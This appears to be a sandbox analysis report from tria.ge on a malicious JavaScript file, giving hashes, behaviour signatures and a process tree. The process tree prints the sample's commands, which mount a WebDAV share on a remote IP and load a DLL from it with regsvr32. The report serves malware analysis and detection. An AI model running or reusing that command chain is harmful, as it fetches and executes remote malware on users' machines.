Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11/07/2024, 09:26
Static task
static1
Behavioral task
behavioral1
Sample
155945859957932489.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
155945859957932489.js
Resource
win10v2004-20240709-en
General
-
Target
155945859957932489.js
-
Size
5KB
-
MD5
02db4fd1a39cf089e9ed8e1c21a6d26e
-
SHA1
49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
-
SHA256
522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
-
SHA512
9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad
-
SSDEEP
96:E5SNRNRZ/viEAwNNq700XA4Nq7008xJBdUjObreVKLVE1T0rQjMDu80+7VGnDuse:QeR1qEpNN600XLN600QGAg76VHdFka
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2764 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2412 wrote to memory of 1544 2412 wscript.exe 30 PID 2412 wrote to memory of 1544 2412 wscript.exe 30 PID 2412 wrote to memory of 1544 2412 wscript.exe 30 PID 1544 wrote to memory of 2620 1544 cmd.exe 32 PID 1544 wrote to memory of 2620 1544 cmd.exe 32 PID 1544 wrote to memory of 2620 1544 cmd.exe 32 PID 1544 wrote to memory of 2764 1544 cmd.exe 33 PID 1544 wrote to memory of 2764 1544 cmd.exe 33 PID 1544 wrote to memory of 2764 1544 cmd.exe 33 PID 1544 wrote to memory of 2764 1544 cmd.exe 33 PID 1544 wrote to memory of 2764 1544 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\155945859957932489.js1⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\155945859957932489.js" "C:\Users\Admin\\xnsbwi.bat" && "C:\Users\Admin\\xnsbwi.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2620
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\554.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2764
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD502db4fd1a39cf089e9ed8e1c21a6d26e
SHA149812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
SHA256522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
SHA5129d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad